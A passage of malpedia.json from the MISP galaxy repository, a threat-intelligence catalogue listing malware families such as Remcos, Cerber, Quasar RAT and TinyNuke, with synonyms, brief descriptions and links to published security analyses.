MISP
/
misp-galaxy
mirror of https://github.com/MISP/misp-galaxy
2
0
Fork 0
Code Issues Releases Wiki Activity
misp-galaxy/clusters/malpedia.json

13301 lines
445 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

{
"description": "Malware galaxy based on Malpedia archive.",
"type": "malpedia",
"authors": [
"Daniel Plohmann",
"Andrea Garavaglia",
"Davide Arcuri"
],
"values": [
{
"uuid": "9ee0eb87-7648-4581-b301-7472a48946ad",
"value": "reGeorg",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://sensepost.com/discover/tools/reGeorg/",
"https://github.com/sensepost/reGeorg"
]
}
},
{
"uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549",
"value": "Quant Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
"https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground",
"https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
"https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/"
]
}
},
{
"uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb",
"value": "Unidentified 049 (Lazarus/RAT)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
]
}
},
{
"uuid": "31615066-dbff-4134-b467-d97a337b408b",
"value": "HawkEye Keylogger",
"description": "",
"meta": {
"synonyms": [
"Predator Pain"
],
"type": [],
"refs": [
"https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/",
"https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html",
"http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html",
"https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/"
]
}
},
{
"uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755",
"value": "Kegotip",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050",
"value": "Rover",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/"
]
}
},
{
"uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f",
"value": "Loki",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/"
]
}
},
{
"uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1",
"value": "Vermin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
]
}
},
{
"uuid": "4d9d0223-32fe-49cf-8608-0e154359528a",
"value": "LokiBot",
"description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html"
]
}
},
{
"uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d",
"value": "Leash",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
]
}
},
{
"uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f",
"value": "Unidentified 022 (Ransom)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9",
"value": "Wonknu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/"
]
}
},
{
"uuid": "df9c8440-b4da-4226-b982-e510d06cf246",
"value": "Unidentified 044",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4",
"value": "Wipbot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
]
}
},
{
"uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2",
"value": "Remcos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://malware-traffic-analysis.net/2017/12/22/index.html",
"https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
"https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
"https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
"https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
"https://secrary.com/ReversingMalware/RemcosRAT/"
]
}
},
{
"uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e",
"value": "CradleCore",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale"
]
}
},
{
"uuid": "b0467c03-824f-4071-8668-f056110d2a50",
"value": "Taleret",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
"http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html"
]
}
},
{
"uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4",
"value": "SynFlooder",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1",
"value": "Poweliks Dropper",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users"
]
}
},
{
"uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255",
"value": "Vflooder",
"description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/"
]
}
},
{
"uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a",
"value": "Cerber",
"description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/",
"https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/",
"https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/"
]
}
},
{
"uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11",
"value": "SysGet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/"
]
}
},
{
"uuid": "67fc358f-da6a-4f01-be23-44bc97319127",
"value": "Shim RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf"
]
}
},
{
"uuid": "f7aae3bc-4a46-4334-a28e-35650289dd1a",
"value": "Uroburos",
"description": "",
"meta": {
"synonyms": [
"Snake"
],
"type": [],
"refs": []
}
},
{
"uuid": "80447111-8085-40a4-a052-420926091ac6",
"value": "AndroRAT",
"description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/DesignativeDave/androrat",
"https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html"
]
}
},
{
"uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5",
"value": "CodeKey",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf"
]
}
},
{
"uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838",
"value": "TinyNuke",
"description": "TinyNuke is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. The author destroyed his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.",
"meta": {
"synonyms": [
"Xbot",
"MicroBankingTrojan",
"NukeBot",
"Nuclear Bot"
],
"type": [],
"refs": [
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596",
"https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702",
"https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet",
"https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html",
"https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/",
"https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/",
"https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/"
]
}
},
{
"uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371",
"value": "UACMe",
"description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.",
"meta": {
"synonyms": [
"Akagi"
],
"type": [],
"refs": [
"https://github.com/hfiref0x/UACME"
]
}
},
{
"uuid": "271752e3-67ca-48bc-ade2-30eec11defca",
"value": "RadRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/"
]
}
},
{
"uuid": "212d1ed7-0519-412b-a1ce-56046ca93372",
"value": "SNEEPY",
"description": "",
"meta": {
"synonyms": [
"ByeByeShell"
],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/"
]
}
},
{
"uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8",
"value": "Misdat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf"
]
}
},
{
"uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819",
"value": "DreamBot",
"description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://lokalhost.pl/gozi_tree.txt",
"https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality"
]
}
},
{
"uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6",
"value": "OneKeyLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malwrhunterteam/status/1001461507513880576"
]
}
},
{
"uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3",
"value": "HesperBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c",
"value": "GlassRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat"
]
}
},
{
"uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d",
"value": "BackSwap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/",
"https://www.cert.pl/en/news/single/backswap-malware-analysis/"
]
}
},
{
"uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9",
"value": "CryptoFortress",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/",
"https://www.lexsi.com/securityhub/cryptofortress/?lang=en",
"http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html"
]
}
},
{
"uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8",
"value": "vSkimmer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.xylibox.com/2013/01/vskimmer.html",
"http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis",
"https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/"
]
}
},
{
"uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2",
"value": "GlobeImposter",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/",
"https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant",
"https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run",
"https://isc.sans.edu/diary/23417",
"https://blog.ensilo.com/globeimposter-ransomware-technical",
"https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet"
]
}
},
{
"uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1",
"value": "Unidentified 003",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b",
"value": "Daserf",
"description": "",
"meta": {
"synonyms": [
"Nioupale",
"Muirim"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/"
]
}
},
{
"uuid": "9de41613-7762-4a88-8e9a-4e621a127f32",
"value": "Morphine",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9",
"value": "MajikPos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/"
]
}
},
{
"uuid": "5f427b3a-7162-4421-b2cd-e6588d518448",
"value": "ATMitch",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/"
]
}
},
{
"uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf",
"value": "ScanPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos",
"https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware"
]
}
},
{
"uuid": "05252643-093b-4070-b62f-d5836683a9fa",
"value": "Quasar RAT",
"description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
"https://github.com/quasar/QuasarRAT/tree/master/Client",
"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
"https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite",
"https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/",
"https://twitter.com/malwrhunterteam/status/789153556255342596",
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments"
]
}
},
{
"uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861",
"value": "Icefog",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.kz-cert.kz/page/502"
]
}
},
{
"uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2",
"value": "Unidentified 037",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad",
"value": "Glasses",
"description": "",
"meta": {
"synonyms": [
"Wordpress Bruteforcer"
],
"type": [],
"refs": [
"https://forum.exploit.in/pda/index.php/t102378.html"
]
}
},
{
"uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614",
"value": "ZhCat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
]
}
},
{
"uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3",
"value": "Koler",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/LukasStefanko/status/928262059875213312"
]
}
},
{
"uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9",
"value": "Sanny",
"description": "",
"meta": {
"synonyms": [
"Daws"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html"
]
}
},
{
"uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6",
"value": "Micrass",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/"
]
}
},
{
"uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8",
"value": "Yahoyah",
"description": "",
"meta": {
"synonyms": [
"KeyBoy"
],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
]
}
},
{
"uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b",
"value": "Limitail",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d3af810f-e657-409c-b821-4b1cf727ad18",
"value": "Bolek",
"description": "",
"meta": {
"synonyms": [
"KBOT"
],
"type": [],
"refs": [
"https://asert.arbornetworks.com/communications-bolek-trojan/",
"http://www.cert.pl/news/11379"
]
}
},
{
"uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef",
"value": "Dharma",
"description": "",
"meta": {
"synonyms": [
"Arena",
"Crysis"
],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/"
]
}
},
{
"uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a",
"value": "ModPOS",
"description": "",
"meta": {
"synonyms": [
"straxbot"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2015/11/modpos.html",
"https://twitter.com/physicaldrive0/status/670258429202530306"
]
}
},
{
"uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f",
"value": "Unidentified 046",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/DrunkBinary/status/1006534471687004160"
]
}
},
{
"uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999",
"value": "CreativeUpdater",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/",
"https://objective-see.com/blog/blog_0x29.html",
"https://digitasecurity.com/blog/2018/02/05/creativeupdater/"
]
}
},
{
"uuid": "1de27925-f94c-462d-acb6-f75822e05ec4",
"value": "Gravity RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/",
"https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html"
]
}
},
{
"uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c",
"value": "SOUNDBITE",
"description": "",
"meta": {
"synonyms": [
"denis"
],
"type": [],
"refs": [
"https://attack.mitre.org/wiki/Software/S0157",
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
]
}
},
{
"uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c",
"value": "Datper",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html"
]
}
},
{
"uuid": "e701b875-8ade-434f-89ff-6c367099bfd8",
"value": "FF RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html"
]
}
},
{
"uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8",
"value": "CycBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/"
]
}
},
{
"uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8",
"value": "pupy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
"https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/",
"https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
"https://github.com/n1nj4sec/pupy"
]
}
},
{
"uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7",
"value": "AlphaLocker",
"description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.cylance.com/an-introduction-to-alphalocker"
]
}
},
{
"uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d",
"value": "Unidentified 050 (APT32 Profiler)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f",
"https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef"
]
}
},
{
"uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf",
"value": "TURNEDUP",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
]
}
},
{
"uuid": "23398248-a52a-4a7c-af10-262822d33a4e",
"value": "backspace",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631",
"value": "Devil's Rat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72",
"value": "RoyalCli",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/nccgroup/Royal_APT",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
]
}
},
{
"uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431",
"value": "RapidStealer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html"
]
}
},
{
"uuid": "d238262a-4832-408f-9926-a7174e671b50",
"value": "WaterSpout",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
]
}
},
{
"uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd",
"value": "SuppoBox",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "b96be762-56a0-4407-be04-fcba76c1ff29",
"value": "HiddenTear",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/",
"https://twitter.com/struppigel/status/950787783353884672",
"https://github.com/goliate/hidden-tear"
]
}
},
{
"uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763",
"value": "Brambul",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.us-cert.gov/ncas/alerts/TA18-149A",
"https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
"https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
]
}
},
{
"uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43",
"value": "SHARPKNOT",
"description": "",
"meta": {
"synonyms": [
"Bitrep"
],
"type": [],
"refs": [
"https://eromang.zataz.com/tag/agentbase-exe/",
"https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
]
}
},
{
"uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57",
"value": "StrongPity",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/physicaldrive0/status/786293008278970368",
"https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
"https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/",
"https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/"
]
}
},
{
"uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1",
"value": "Furtim",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://sentinelone.com/blogs/sfg-furtims-parent/",
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f"
]
}
},
{
"uuid": "add29684-94b7-4c75-a43b-d039c4b76158",
"value": "pgift",
"description": "Information gathering and downloading tool used to deliver second stage malware to the infected system",
"meta": {
"synonyms": [
"ReRol"
],
"type": [],
"refs": [
"https://community.fireeye.com/external/1093"
]
}
},
{
"uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222",
"value": "QtBot",
"description": "",
"meta": {
"synonyms": [
"qtproject"
],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/"
]
}
},
{
"uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e",
"value": "Combos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018",
"value": "Sinowal",
"description": "",
"meta": {
"synonyms": [
"Quarian",
"Mebroot",
"Anserin",
"Theola"
],
"type": [],
"refs": [
